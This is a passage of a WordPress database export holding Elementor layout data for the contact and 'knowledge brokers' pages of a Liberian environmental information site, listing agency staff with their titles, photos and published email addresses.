href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23524,3423,'_elementor_edit_mode','builder'),(23525,3423,'_elementor_template_type','wp-page'),(23526,3423,'_elementor_version','3.0.16'),(23527,3423,'_wp_page_template','default'),(23528,3423,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a 